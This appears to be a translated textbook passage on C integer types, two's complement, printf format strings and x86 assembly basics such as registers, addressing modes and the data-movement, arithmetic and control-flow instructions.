By default, integers in C are signed. Below we declare a signed integer and an unsigned integer:

int var1 = 0;
unsigned int var2 = 0;

Signed integers
- can represent positive or negative values
- range of int: -2,147,483,648 ~ 2,147,483,647
Unsigned integers
- can only represent zero or positive values
- range of unsigned int: 0 ~ 4,294,967,295

Whether a type is signed or unsigned depends on whether it can carry a +/- sign:

Signed
- int
- signed int
- long
Unsigned
- uint
- unsigned int
- unsigned long

In a signed int, the most significant bit is called the sign bit. When the sign bit is 1 the value is negative; when it is 0 the value is non-negative:

0x7FFFFFFF = 2147483647
- 01111111111111111111111111111111
0x80000000 = -2147483648
- 10000000000000000000000000000000
0xFFFFFFFF = -1
- 11111111111111111111111111111111
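The three bit patterns above can be reinterpreted with Python's struct module, which packs a value as an unsigned 32-bit integer and unpacks the same bytes as a signed one. This is only a sketch to check the table; the helper name as_signed32 is made up.

```python
import struct

def as_signed32(bits: int) -> int:
    """Reinterpret a 32-bit pattern as a signed int."""
    raw = struct.pack("<I", bits & 0xFFFFFFFF)   # store as unsigned
    return struct.unpack("<i", raw)[0]           # read back as signed

for bits in (0x7FFFFFFF, 0x80000000, 0xFFFFFFFF):
    print(f"{bits:#010x} -> {as_signed32(bits)}")
```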

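Two's complement represents negative numbers in a way that suits a binary adder: adding a negative number in two's complement form to the positive number of equal magnitude gives 0. To obtain the two's complement of a number, write the positive number in binary, invert all the bits, and then add 1: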

eg: 0x00123456
  = 1193046
  = 00000000000100100011010001010110
 ~= 11111111111011011100101110101001
 += 11111111111011011100101110101010
  = -1193046 (0xFFEDCBAA)
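The invert-then-add-one recipe is easy to replay in Python, where masking to 32 bits stands in for the fixed register width. The function below is a sketch written for this example, not a library routine.

```python
def twos_complement_negate(value: int, bits: int = 32) -> int:
    """Return the bit pattern of -value in a `bits`-wide register."""
    mask = (1 << bits) - 1
    inverted = ~value & mask         # flip every bit
    return (inverted + 1) & mask     # then add one

pattern = twos_complement_negate(0x00123456)
print(f"{pattern:#010x}")
print((0x00123456 + pattern) & 0xFFFFFFFF)   # the pair sums to zero
```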

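The compiler has to emit the appropriate instructions based on the type of each variable:

Signed instructions
- IDIV: signed divide
- IMUL: signed multiply
- SAL: arithmetic left shift (the same operation as SHL)
- SAR: arithmetic right shift (preserves the sign)
- MOVSX: move with sign extension
- JL: jump if less
- JLE: jump if less or equal
- JG: jump if greater
- JGE: jump if greater or equal
Unsigned instructions
- DIV: unsigned divide
- MUL: unsigned multiply
- SHL: logical left shift
- SHR: logical right shift
- MOVZX: move with zero extension
- JB: jump if below
- JBE: jump if below or equal
- JA: jump if above
- JAE: jump if above or equal

Integer data types on a 32-bit machine (these may differ between systems):

C data type	Minimum value	Maximum value	Minimum size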
char	-128	127	8 bits
short	-32 768	32 767	16 bits
int	-2 147 483 648	2 147 483 647	16 bits
long	-2 147 483 648	2 147 483 647	32 bits
long long	-9 223 372 036 854 775 808	9 223 372 036 854 775 807	64 bits

Fixed-size data types:

Signed integers
- int[# of bits]_t
- int8_t, int16_t, int32_t
Unsigned integers
- uint[# of bits]_t
- uint8_t, uint16_t, uint32_t

More information can be found in stdint.h and limits.h:

man stdint.h
cat /usr/include/stdint.h
man limits.h
cat /usr/include/limits.h

Knowing the signedness and size of integers is very useful; integer overflow is covered in a later chapter.
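Python's ctypes module exposes C-style fixed-width integer types, which makes it convenient for previewing how values wrap at a given size. The snippet is a sketch for experimentation: ctypes truncates out-of-range values silently, which mimics the stored result but says nothing about C's rules for signed overflow.

```python
import ctypes

wrapped_int8 = ctypes.c_int8(127 + 1).value           # one past INT8_MAX
wrapped_uint8 = ctypes.c_uint8(-1).value              # -1 stored unsigned
wrapped_int32 = ctypes.c_int32(0x7FFFFFFF + 1).value  # one past INT32_MAX

print(wrapped_int8, wrapped_uint8, wrapped_int32)
print(ctypes.sizeof(ctypes.c_int16))                  # size in bytes
```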

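Formatted Output Functions

The C standard (and POSIX, for dprintf and vdprintf) defines the following formatted output functions (see man 3 printf):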

#include <stdio.h>

int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);

#include <stdarg.h>

int vprintf(const char *format, va_list ap);
int vfprintf(FILE *stream, const char *format, va_list ap);
int vdprintf(int fd, const char *format, va_list ap);
int vsprintf(char *str, const char *format, va_list ap);
int vsnprintf(char *str, size_t size, const char *format, va_list ap);

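fprintf() writes output to a stream according to the format string. Its three arguments are the stream, the format string, and the variable argument list.
printf() is equivalent to fprintf(), except that it assumes the output stream is stdout.
sprintf() is equivalent to fprintf(), except that the output is written to an array rather than a stream. A null character is appended at the end of the written string.
snprintf() is equivalent to sprintf(), except that it takes the maximum number of characters to write, size. When size is greater than zero, output beyond the first size-1 characters is discarded rather than written to the array, and a null character is appended to the string written to the array.
dprintf() is equivalent to fprintf(), except that it writes to a file descriptor fd instead of a stream.
vfprintf(), vprintf(), vsprintf(), vsnprintf(), and vdprintf() correspond to the functions above, except that they take a va_list argument in place of the variable argument list.

Format Strings

A format string is a sequence of characters made up of ordinary characters (anything other than %) and conversion specifications. Ordinary characters are copied to the output stream unchanged. Each conversion specification converts its corresponding argument according to the conversion specifier and writes the result to the output stream.

A conversion specification consists of optional parts and a required part:

%[parameter][flags][width][.precision][length]conversion-specifier

(Required) Conversion specifier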

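Character	Description
`d`, `i`	Signed decimal `int`. '`%d`' and '`%i`' are synonymous for output, but differ for `scanf()` input, where `%i` interprets a value prefixed with `0x` or `0` as hexadecimal or octal respectively. If a precision is given, output with fewer digits is padded with 0 on the left. The default precision is 1. With a precision of 0 and a value of 0, the output is empty
`u`	Decimal `unsigned int`. If a precision is given, output with fewer digits is padded with 0 on the left. The default precision is 1. With a precision of 0 and a value of 0, the output is empty
`f`, `F`	`double` in decimal fixed-point notation. '`f`' and '`F`' differ in how infinity and NaN are printed: '`f`' prints '`inf`', '`infinity`', and '`nan`'; '`F`' prints '`INF`', '`INFINITY`', and '`NAN`'. The number of digits after the decimal point equals the precision, and the last digit is rounded. The default precision is 6. If the precision is 0 and the # flag is absent, no decimal point appears. There is at least one digit to the left of the decimal point
`e`, `E`	`double` value printed in the decimal form [`-`]d.ddd `e`[`+`/`-`]ddd. The `E` version uses `E` (rather than `e`) as the exponent symbol. The exponent contains at least 2 digits; if the value is 0, the exponent is 00. On Windows the exponent has at least 3 digits, for example 1.5e002, which can be changed with Microsoft's runtime function `_set_output_format`. There is one digit before the decimal point. The number of digits after the decimal point equals the precision. The default precision is 6. If the precision is 0 and the # flag is absent, no decimal point appears
`g`, `G`	`double` value, with the precision defined as the total number of significant digits. When the exponent is at least -4 and less than the precision, fixed-point form is used; otherwise exponential form is used. '`g`' uses lowercase letters and '`G`' uppercase. Trailing zeros to the right of the decimal point are not shown; the decimal point is shown only if the fractional part is non-zero
`x`, `X`	Hexadecimal `unsigned int`. '`x`' uses lowercase letters and '`X`' uppercase. If a precision is given, output with fewer digits is padded with 0 on the left. The default precision is 1. With a precision of 0 and a value of 0, the output is empty
`o`	Octal `unsigned int`. If a precision is given, output with fewer digits is padded with 0 on the left. The default precision is 1. With a precision of 0 and a value of 0, the output is empty
`s`	Without the `l` modifier, prints a `null`-terminated string up to the limit given by the precision; if no precision is given, all bytes are printed. With the `l` modifier, the argument points to an array of `wchar_t`, and each wide character is converted to a multibyte character on output, as if by calling `wcrtomb`
`c`	Without the `l` modifier, the `int` argument is converted to `unsigned char` and printed; with the `l` modifier, the `wint_t` argument is converted to a two-element `wchar_t` array whose first element holds the character to print and whose second element is the `null` wide character
`p`	`void *` value; prints the value of the corresponding variable. `printf("%p", a)` prints the value of variable `a` in address format, and `printf("%p", &a)` prints the address where variable `a` is stored
`a`, `A`	Hexadecimal representation of a `double`, "[−]0xh.hhhh p±d", where the exponent is written in decimal. For example, 1025.010 is printed as 0x1.004000p+10. '`a`' uses lowercase letters and '`A`' uppercase
`n`	Prints nothing, but writes the number of characters successfully output so far into the variable pointed to by the corresponding integer pointer argument
`%`	A literal '`%`'; accepts no parts other than `parameter`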

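(Optional) Parameter

Character	Description
`n$`	`n` is the number of the argument to display with this format specifier. This allows an argument to be output several times, with several format specifiers, and in a different order. If any placeholder uses `parameter`, all other placeholders must use `parameter` as well. Example: `printf("%2$d %2$#x; %1$d %1$#x",16,17)` produces "`17 0x11; 16 0x10`"

(Optional) Flags

Character	Description
`+`	Always print the '`+`' or '`-`' sign of a signed value; by default the sign of positive numbers is omitted. Applies to numeric types only
space	If a signed conversion produces no sign or zero characters, prefix the output with one space. If the space and '`+`' flags both appear, the space flag is ignored
`-`	Left-justify. The default is right-justify
`#`	For '`g`' and '`G`', trailing zeros are not removed, to show the precision. For '`f`', '`F`', '`e`', '`E`', '`g`', '`G`', a decimal point is always output. For '`o`', '`x`', '`X`', the prefixes `0`, `0x`, and `0X` respectively are output before non-zero values to indicate the base
`0`	If the `width` option is prefixed with `0`, pad on the left with `0` until the width is reached. For example, `printf("%2d", 3)` prints "` 3`", while `printf("%02d", 3)` prints "`03`". If both `0` and `-` appear, `0` is ignored, so left-justified output is still padded with spaces

(Optional) Width

A non-negative decimal integer giving the minimum number of characters to output. If the value needs more characters than the width, it is printed in full; if it needs fewer, it is padded with spaces or 0.

(Optional) Precision

The precision is a non-negative decimal integer that specifies the number of characters printed, the number of decimal places, or the number of significant digits. For the integer conversions d, i, u, x, and o, it is the minimum number of digits; missing digits are filled with 0 on the left, values with more digits are not truncated, and the default is 1. For the floating-point conversions a, A, e, E, f, and F, it is the number of digits shown to the right of the decimal point, rounded if necessary; the default is 6. For the floating-point conversions g and G, it is the maximum number of significant digits. For the string conversion s, it is the upper limit on the number of bytes output; characters beyond the limit are cut off. If the precision is given as *, its value is taken from the corresponding function argument. If only the decimal point is given, the precision is 0.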

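(Optional) Length

Character	Description
`hh`	For integer types, `printf` expects an `int` argument promoted from `char`
`h`	For integer types, `printf` expects an `int` argument promoted from `short`
`l`	For integer types, `printf` expects a `long` argument. For floating-point types, `printf` expects a `double` argument. For the string conversion `s`, `printf` expects a `wchar_t` pointer argument. For the character conversion `c`, `printf` expects a `wint_t` argument
`ll`	For integer types, `printf` expects a `long long` argument. Microsoft also accepts `I64`
`L`	For floating-point types, `printf` expects a `long double` argument
`z`	For integer types, `printf` expects a `size_t` argument
`j`	For integer types, `printf` expects an `intmax_t` argument
`t`	For integer types, `printf` expects a `ptrdiff_t` argument

Examples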

printf("Hello %%");           // "Hello %"
printf("Hello World!");       // "Hello World!"
printf("Number: %d", 123);    // "Number: 123"
printf("%s %s", "Format", "Strings");   // "Format Strings"

printf("%12c", 'A');          // "           A"
printf("%16s", "Hello!");     // "          Hello!"

int n;
printf("%12c%n", 'A', &n);    // n = 12
printf("%16s%n", "Hello!", &n); // n = 16

printf("%2$s %1$s", "Format", "Strings"); // "Strings Format"
printf("%42c%1$n", &n);       // first prints 41 spaces, then the low 8 bits of n's address as a character
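Several of these flag, width, and precision rules can be tried out quickly with Python's % operator, which follows the C printf conventions for the cases shown here. This is an analogy, not a replacement for testing in C: Python has no %n and no n$ positional parameters, so the character count that %n would store is emulated with len().

```python
examples = [
    ("%12c", "A"),        # width 12, right-justified character
    ("%16s", "Hello!"),   # width 16, right-justified string
    ("%02d", 3),          # zero padding up to width 2
    ("%+d", 5),           # always show the sign
    ("%#x", 17),          # alternate form adds the 0x prefix
    ("%.3d", 7),          # precision: at least 3 digits
    ("%.2s", "Hello"),    # precision: at most 2 bytes of the string
]
rendered = [fmt % arg for fmt, arg in examples]
for text in rendered:
    print(repr(text))

# What %n would store after "%12c": the number of characters written so far.
n = len("%12c" % "A")
print(n)
```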

We now have a detailed picture of the formatted output functions and format strings; format string vulnerabilities are covered in a later chapter.

Assembly Language

Assembly Language
- 3.3 x86 Assembly Basics
  - 3.3.2 Registers
  - 3.3.3 Memory and Addressing Modes
  - 3.3.4 Instructions
  - 3.3.5 Calling Convention
    - 3.3.5.1 Caller Rules
    - 3.3.5.2 Callee Rules
- 3.4 x64 Assembly Basics
  - 3.4.1 Introduction
  - 3.4.2 Registers
  - 3.4.3 Addressing Modes
  - 3.4.4 Common Instructions
- 3.5 ARM Assembly Basics
- 3.6 MIPS Assembly Basics

3.3 x86 Assembly Basics

3.3.2 Registers

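Modern x86 processors (386 and later) have eight 32-bit general-purpose registers, as shown in Figure 1.

The register names are mostly historical. For example, EAX used to be called the accumulator because it was used for many arithmetic operations, and ECX was called the counter because it was used to hold a loop index (the loop count). Although most registers have lost their special purposes in the modern instruction set, by convention two are still reserved for special purposes: ESP and EBP.

The EAX, EBX, ECX, and EDX registers can be used in sections. For example, the least significant 2 bytes of EAX can be treated as a 16-bit register (AX). The least significant byte of AX can be used as an 8-bit register (AL), and the most significant byte of AX as another 8-bit register (AH). These names refer to the same physical register: when a two-byte value is placed in DX, the contents of DH, DL, and EDX are all affected. These sub-registers are mainly holdovers from older, 16-bit versions of the instruction set. They are still sometimes convenient when handling data smaller than 32 bits, such as a 1-byte ASCII character.

3.3.3 Memory and Addressing Modes

3.3.3.1 Declaring Static Data Regions

You can declare static data regions in memory (similar to global variables) using special x86 assembler directives. The .data directive introduces data declarations. Following it, the directives .byte, .short, and .long declare 1-byte, 2-byte, and 4-byte data respectively. Declarations can be given labels so that the address of the created data can be referenced. Labels are very useful in assembly language: they give names to memory addresses, which the assembler and linker later translate into addresses the machine understands. This is similar to declaring variables by name, but it follows some lower-level rules. For example, locations declared in sequence are stored next to each other in memory, in the order in which they are declared.

Some examples: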

.data
var :
       .byte 64 ;declare a byte-sized variable var holding the value 64
       .byte 10 ;declare a byte holding the value 10; it has no label, and its address is var+1

x :
       .short 42 ;declare a 2-byte value with the label "x"

y :
       .long 30000 ;declare a 4-byte value with the label "y", initialized to 30000

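Unlike high-level languages, where arrays can have many dimensions and are accessed by index, arrays in x86 assembly language are simply a number of cells located contiguously in memory. An array can be declared just by listing its values, as in the first example below. For the special case of byte arrays, string literals can be used. To fill a region of memory with zeros, use the .zero directive.

Examples: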

s :
       .long 1, 2, 3 ;declare three 4-byte values 1, 2, and 3; the value at location s+8 is 3

barr:
       .zero 10 ;declare 10 bytes starting at location barr, all initialized to 0

str :
       .string "hello" ;declare 6 bytes starting at location str: the ASCII values of hello followed by a nul (0) byte
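The byte layout these declarations produce can be previewed with Python's struct module. The sketch assumes a little-endian x86 target and no alignment directives, so each item is placed directly after the previous one; the variable names s_off and str_off are made up to stand in for the labels.

```python
import struct

data = struct.pack("<BB", 64, 10)       # var: .byte 64 then .byte 10
data += struct.pack("<H", 42)           # x:   .short 42
data += struct.pack("<I", 30000)        # y:   .long 30000
s_off = len(data)                       # offset of label s
data += struct.pack("<3I", 1, 2, 3)     # s:    .long 1, 2, 3
data += bytes(10)                       # barr: .zero 10
str_off = len(data)                     # offset of label str
data += b"hello\x00"                    # str:  .string "hello"

print(data[:8].hex(" "))                           # var, x and y
value_at_s_plus_8 = struct.unpack_from("<I", data, s_off + 8)[0]
print(value_at_s_plus_8)
print(len(data) - str_off)                         # bytes used by the string
```

Reading four bytes at s+8 yields the third array element, which is exactly the pointer arithmetic the assembly comments describe.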

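3.3.3.2 Addressing Memory

Modern x86-compatible processors can address up to 2^32 bytes of memory: memory addresses are 32 bits wide. In the examples above, where we used labels to refer to memory regions, the assembler actually replaces these labels with 32-bit quantities that specify addresses in memory. In addition to referring to memory regions by label (that is, by constant value), x86 provides a flexible scheme for computing and referring to memory addresses: up to two 32-bit registers and one 32-bit signed constant can be added together to compute a memory address. One of the registers can optionally be pre-multiplied by 2, 4, or 8.

Addressing modes can be used with many x86 instructions (we describe them in the next section). Here we illustrate them with the mov instruction, which moves data between registers and memory. The instruction has two operands: the first is the source and the second is the destination.

Some mov examples: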

mov (%ebx), %eax ;load 4 bytes from the memory address in EBX into EAX
;unless stated otherwise, (%ebx) denotes the memory at the address held in register EBX

mov %ebx, var(,1) ;move the 4 bytes in EBX to the memory location labeled var (var is a 32-bit constant)

mov (%esi, %ebx, 4), %edx ;move the 4 bytes of data at address ESI+4*EBX into EDX

一些错误的例子:

mov (%ebx, %ecx, -1), %eax ;这个只能把寄存器中的值加上一遍.
mov %ebx,(%eax, %esi, %edi, 1) ;在地址计算中, 最多只能出现 2 个寄存器, 这里却有 3 个寄存器.
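The address computation described above can be sketched as a small Python function. The name `effective_address` and its keyword arguments are hypothetical; the sketch only models the arithmetic of `disp(base, index, scale)` for 32-bit addresses.

```python
def effective_address(disp=0, base=0, index=0, scale=1):
    """Model the AT&T operand disp(base, index, scale) for 32-bit addresses."""
    if scale not in (1, 2, 4, 8):
        # Mirrors the rule that only these scale factors can be encoded.
        raise ValueError("scale must be 1, 2, 4 or 8")
    return (disp + base + index * scale) & 0xFFFFFFFF  # wrap to 32 bits

# (%esi, %ebx, 4) with ESI = 0x1000 and EBX = 3
print(hex(effective_address(base=0x1000, index=3, scale=4)))  # 0x100c

# -4(%ebp) with EBP = 0x2000: the displacement is signed
print(hex(effective_address(disp=-4, base=0x2000)))  # 0x1ffc
```

A call such as `effective_address(base=1, index=2, scale=-1)` raises `ValueError`, which corresponds to the first invalid example above.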

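3.3.3.3 Operation Suffixes

In general, the intended size of the data item at a given memory address can be inferred from the assembly instruction that references it. In all of the instructions above, for example, the size of the memory region can be inferred from the size of the register operand. When we load a 32-bit register, the assembler infers that the memory region is 4 bytes wide. When we store the value of a 1-byte register to memory, the assembler infers that we want a single byte of memory.

In some cases, however, the size of the referenced memory region is ambiguous. Consider the instruction mov $2, (%ebx). Should it move the value 2 into the single byte at the address in EBX? Or should it move the 32-bit integer representation of 2 into the 4 bytes starting at the address in EBX? Both interpretations are valid, so the assembler must be told explicitly which one is meant. The size suffixes b, w, and l serve this purpose, indicating sizes of 1, 2, and 4 bytes respectively.

For example:

movb $2, (%ebx)  # Move 2 into the single byte at the address stored in EBX.
movw $2, (%ebx)  # Move the 16-bit integer 2 into the 2 bytes starting at the address in EBX.
movl $2, (%ebx)  # Move the 32-bit integer 2 into the 4 bytes starting at the address in EBX.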

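3.3.4 Instructions

Machine instructions generally fall into three categories: data movement, arithmetic/logic, and control flow. This section covers important examples of x86 instructions from each category. It is not an exhaustive list; for the complete instruction set, see Intel's instruction set reference.

We use the following notation:

<reg32>  Any 32-bit register (%eax, %ebx, %ecx, %edx, %esi, %edi, %esp, or %ebp)
<reg16>  Any 16-bit register (%ax, %bx, %cx, or %dx)
<reg8>   Any 8-bit register (%ah, %al, %bh, %bl, %ch, %cl, %dh, %dl)
<reg>    Any register
<mem>    A memory address, e.g. (%eax), 4+var, (%eax, %ebx, 1)
<con32>  Any 32-bit constant
<con16>  Any 16-bit constant
<con8>   Any 8-bit constant
<con>    Any 8-, 16-, or 32-bit constant

In assembly language, all labels and numeric constants used as immediate operands (that is, not in an address calculation such as 3(%eax, %ebx, 8)) are always prefixed by a dollar sign $. When needed, hexadecimal notation can be used with the 0x prefix, e.g. $0xABC. Without the prefix, numbers are interpreted as decimal.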

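3.3.4.1 Data Movement Instructions

mov (move)

The mov instruction copies the data item referred to by its first operand (register contents, memory contents, or a constant value) into the location referred to by its second operand (a register or memory). Register-to-register moves are possible, but direct memory-to-memory moves are not. To transfer data between two memory locations, the source memory contents must first be loaded into a register and then stored to the destination memory address.

Syntax

mov <reg>, <reg>
mov <reg>, <mem>
mov <mem>, <reg>
mov <con>, <reg>
mov <con>, <mem>

Examples

mov %ebx, %eax    # Copy the value in EBX into EAX.
movb $5, var(,1)  # Store the value 5 into the byte at location var.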


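push (push onto the stack)

The push instruction places its operand onto the top of the hardware-supported stack in memory. Specifically, push first decrements ESP by 4 and then places its operand into the 32-bit location at address (%esp). ESP (the stack pointer) is decremented by every push, so the stack grows from high addresses toward low addresses.

Syntax

push <reg32>
push <mem>
push <con32>

Examples

push %eax      # Push EAX onto the stack.
push var(,1)   # Push the 4 bytes at address var onto the stack.

pop (pop from the stack)

The pop instruction removes the 4-byte data element from the top of the hardware-supported stack and places it in the specified operand (a register or a memory location). It first moves the 4 bytes located at memory location (%esp) into the specified register or memory location, and then increments ESP by 4.

Syntax

pop <reg32>
pop <mem>

Examples

pop %edi     # Pop the top element of the stack into EDI.
pop (%ebx)   # Pop the top element of the stack into the 4 bytes of memory starting at the address in EBX.

Key point: the stack is a special kind of storage, distinguished by how it is accessed: the item that entered most recently is the first to leave, i.e. "last in, first out" (LIFO).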
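The push and pop behavior described above can be modeled in a few lines of Python. This is a minimal sketch: the class name `Stack32`, the 64-byte memory size, and the little-endian layout are assumptions made for illustration.

```python
import struct

class Stack32:
    """Toy model of a downward-growing stack of 32-bit values."""

    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.esp = size  # empty stack: ESP sits just past the highest address

    def push(self, value):
        self.esp -= 4  # push decrements ESP first ...
        struct.pack_into("<I", self.mem, self.esp, value & 0xFFFFFFFF)  # ... then stores

    def pop(self):
        (value,) = struct.unpack_from("<I", self.mem, self.esp)  # pop loads first ...
        self.esp += 4  # ... then increments ESP
        return value

s = Stack32()
s.push(1)
s.push(2)
print(s.esp)             # 56: two pushes moved ESP down by 8
print(s.pop(), s.pop())  # 2 1: last in, first out
```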

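lea (load effective address)

The lea instruction places the address specified by its first operand into the register specified by its second operand. Note that the contents of the memory location are not loaded; only the effective address is computed and placed into the register. This is useful for obtaining a pointer into a memory region or for performing simple arithmetic.

If this is confusing, here is a more informal explanation of the difference between lea and mov, written in 16-bit Intel syntax (destination first). MOV transfers data: MOV AX,[1000H] uses 1000H as an offset address, finds that memory cell, and copies its contents into AX. LEA takes the offset address: LEA AX,[1000H] places the offset 1000H of the source operand [1000H] into AX. To read it, simply drop the brackets: it is equivalent to MOV AX,1000H. Likewise, LEA BX,[SI] is equivalent to MOV BX,SI, and LEA BX,TABLE is equivalent to MOV BX,OFFSET TABLE. Sometimes MOV cannot be substituted directly: LEA AX,[SI+6] cannot be rewritten as MOV AX,SI+6, but it can be replaced by two steps, MOV AX,SI followed by ADD AX,6.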


Syntax

lea <mem>, <reg32>

Examples

lea (%ebx,%esi,8), %edi  # The quantity EBX + 8*ESI is placed in EDI.
lea val(,1), %eax        # The address val is placed in EAX.

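3.3.4.2 Arithmetic and Logic Instructions

add (integer addition)

The add instruction adds its two operands together and stores the result in its second operand. Both operands may be registers, but at most one operand may be a memory location. The syntax makes this concrete:

Syntax

add <reg>, <reg>
add <mem>, <reg>
add <reg>, <mem>
add <con>, <reg>
add <con>, <mem>

Examples

add $10, %eax     # EAX is set to EAX + 10.
addb $10, (%eax)  # Add 10 to the single byte stored at the memory address in EAX.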

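sub (integer subtraction)

The sub instruction subtracts its first operand from its second operand (second minus first) and stores the result in the second operand. As with add, both operands may be registers, but at most one operand may be a memory location.

Syntax

sub <reg>, <reg>
sub <mem>, <reg>
sub <reg>, <mem>
sub <con>, <reg>
sub <con>, <mem>

Examples

sub %ah, %al    # AL is set to AL - AH.
sub $216, %eax  # Subtract 216 from the value stored in EAX.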

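inc, dec (increment, decrement)

The inc instruction increments the contents of its operand by 1; the dec instruction decrements the contents of its operand by 1.

Syntax

inc <reg>
inc <mem>
dec <reg>
dec <mem>

Examples

dec %eax      # Subtract 1 from the contents of EAX.
incl var(,1)  # Add 1 to the 32-bit integer stored at location var.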

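imul (integer multiplication)

The imul instruction has two basic formats: two-operand (the first two syntax lines below) and three-operand (the last two syntax lines below).

The two-operand form multiplies its two operands together and stores the result in the second operand. The result (second) operand must be a register.

The three-operand form multiplies its first and second operands together and stores the result in its third operand, which must be a register. In addition, the first operand must be a constant value.

Syntax

imul <reg32>, <reg32>
imul <mem>, <reg32>
imul <con>, <reg32>, <reg32>
imul <con>, <mem>, <reg32>

Examples

imul (%ebx), %eax     # Multiply the contents of EAX by the 32-bit contents of the memory at the address in EBX. Store the result in EAX.
imul $25, %edi, %esi  # ESI is set to EDI * 25.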

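idiv (integer division)

The idiv instruction takes a single operand, the divisor. The dividend is the 64-bit integer EDX:EAX (EDX holds the most significant four bytes and EAX the least significant four bytes). The quotient is stored in EAX and the remainder in EDX.

Syntax

idiv <reg32>
idiv <mem>

Examples

idiv %ebx     # Divide the contents of EDX:EAX by the contents of EBX. Place the quotient in EAX and the remainder in EDX.
idivl (%ebx)  # Divide the contents of EDX:EAX by the 32-bit value stored at the memory address in EBX. Place the quotient in EAX and the remainder in EDX.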
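The 32-bit form of idiv can be modeled in Python as follows. The function names `to_signed` and `idiv32` are hypothetical; the sketch assumes registers are passed as unsigned 32-bit integers and that, as on x86, signed division truncates toward zero and the remainder takes the sign of the dividend.

```python
def to_signed(value, bits):
    """Interpret the low `bits` bits of value as a two's-complement integer."""
    value &= (1 << bits) - 1
    return value - (1 << bits) if value >> (bits - 1) else value

def idiv32(edx, eax, divisor):
    """Model `idiv <reg32>`: returns (quotient for EAX, remainder for EDX)."""
    dividend = to_signed((edx << 32) | eax, 64)
    d = to_signed(divisor, 32)
    if d == 0:
        raise ZeroDivisionError("divide error")
    quotient = abs(dividend) // abs(d)
    if (dividend < 0) != (d < 0):
        quotient = -quotient          # truncate toward zero, unlike Python's //
    remainder = dividend - quotient * d
    if not -2**31 <= quotient <= 2**31 - 1:
        raise OverflowError("quotient does not fit in EAX")
    return quotient & 0xFFFFFFFF, remainder & 0xFFFFFFFF

print(idiv32(0, 7, 2))  # (3, 1)

# -7 / 2: EDX:EAX holds the sign-extended dividend
q, r = idiv32(0xFFFFFFFF, 0xFFFFFFF9, 2)
print(to_signed(q, 32), to_signed(r, 32))  # -3 -1
```

The second call shows why EDX must hold the sign extension of EAX before dividing a negative 32-bit value.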

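and, or, xor (bitwise logical and, or, and exclusive or)

These instructions perform the specified bitwise logical operation on their operands and place the result in the second operand.

Syntax

and <reg>, <reg>
and <mem>, <reg>
and <reg>, <mem>
and <con>, <reg>
and <con>, <mem>

or <reg>, <reg>
or <mem>, <reg>
or <reg>, <mem>
or <con>, <reg>
or <con>, <mem>

xor <reg>, <reg>
xor <mem>, <reg>
xor <reg>, <mem>
xor <con>, <reg>
xor <con>, <mem>

Examples

and $0x0F, %eax  # Clear all but the last 4 bits of EAX.
xor %edx, %edx   # Set the contents of EDX to zero.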

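not (bitwise logical not)

Logically negates the operand contents, that is, flips every bit of the operand.

Syntax

not <reg>
not <mem>

Example

not %eax  # Flip all the bits of EAX.

neg (negate)

Performs the two's complement negation of the operand contents.

Syntax

neg <reg>
neg <mem>

Example

neg %eax  # EAX is set to -EAX.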

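shl, shr (shift left, shift right)

These instructions shift the bits of their second operand (the destination) left or right by the number of positions given by the first operand, padding the vacated bit positions with zeros. The destination can be shifted by up to 31 places. The shift count can be either an 8-bit constant or the register CL. In either case, shift counts greater than 31 are taken modulo 32.

Syntax

shl <con8>, <reg>
shl <con8>, <mem>
shl %cl, <reg>
shl %cl, <mem>

shr <con8>, <reg>
shr <con8>, <mem>
shr %cl, <reg>
shr %cl, <mem>

Examples

shl $1, %eax   # Multiply the value of EAX by 2 (if the most significant bit is 0).
shr %cl, %ebx  # Store in EBX the floor of the value of EBX divided by 2^n, where n is the value in CL.

You may wonder why shifting the binary digits by one position multiplies the number by 2. The results of these bit operations follow from how computers represent numbers; see the appendix on number representation in this chapter.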
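The relationship between shifting and multiplying or dividing by powers of two can be checked with a small Python model. The names `shl32` and `shr32` are hypothetical; the sketch assumes 32-bit operands and masks the count to 5 bits, as described above.

```python
def shl32(value, count):
    """Model `shl count, <reg32>`: logical left shift on a 32-bit value."""
    count &= 31                       # counts above 31 are taken modulo 32
    return (value << count) & 0xFFFFFFFF

def shr32(value, count):
    """Model `shr count, <reg32>`: logical right shift, zero-filling from the left."""
    count &= 31
    return (value & 0xFFFFFFFF) >> count

print(shl32(3, 1))                # 6: same as 3 * 2
print(shr32(40, 3))               # 5: same as 40 // 2**3
print(hex(shl32(0x80000001, 1)))  # 0x2: the top bit is shifted out, so this is not a multiplication by 2
print(shl32(1, 33))               # 2: a count of 33 behaves like a count of 1
```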

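3.3.4.3 Control Flow Instructions

The x86 processor maintains an instruction pointer (EIP), a 32-bit register that indicates the location in memory of the instruction to be executed: whichever memory cell it points to, the machine code stored there is what the program runs. Normally it points to the next instruction to execute. The EIP register cannot be manipulated directly; it is updated implicitly by the control flow instructions.

We use the notation <label> to refer to labeled locations in the program text. A label can be inserted anywhere in x86 assembly code text by entering a label name followed by a colon. For example:

       mov 8(%ebp), %esi
begin:
       xor %ecx, %ecx
       mov (%esi), %eax

The second instruction in this code fragment is labeled begin. Elsewhere in the code, we can refer to the memory location of this instruction using the more convenient symbolic name begin. The label is just a convenient way of expressing the location instead of writing out its 32-bit value.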

jmp (jump)

Transfers program control flow to the instruction at the memory location indicated by the operand.

Syntax

jmp <label>

Example

jmp begin  # Jump to the instruction labeled begin.


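jcondition (conditional jump)

These instructions are conditional jumps based on the status of a set of condition codes stored in a special register called the machine status word. The contents of the machine status word include information about the last arithmetic operation performed. For example, one bit of this word indicates whether the last result was zero, and another indicates whether the last result was negative. Based on these condition codes, a number of conditional jumps can be performed. For example, the jz instruction jumps to the specified label if the result of the last arithmetic operation was zero; otherwise, control proceeds to the next instruction in sequence.

Many of the conditional branches have names that are intuitive when the preceding instruction is the special compare instruction, cmp (see below). For example, jle and jne branch on the result of a cmp performed on the desired operands just before them.

Syntax

je <label>   # jump when equal
jne <label>  # jump when not equal
jz <label>   # jump when the last result was zero
jg <label>   # jump when greater than
jge <label>  # jump when greater than or equal to
jl <label>   # jump when less than
jle <label>  # jump when less than or equal to

Example

cmp %ebx, %eax
jle done
# If the contents of EAX are less than or equal to the contents of EBX, jump to the label done. Otherwise, continue to the next instruction.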


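cmp (compare)

Compares the values of the two specified operands, setting the condition codes in the machine status word appropriately. This instruction is equivalent to sub, except that the result of the subtraction is discarded instead of replacing an operand.

Syntax

cmp <reg>, <reg>
cmp <mem>, <reg>
cmp <reg>, <mem>
cmp <con>, <reg>
cmp <con>, <mem>

Example

cmpb $10, (%ebx)
je loop
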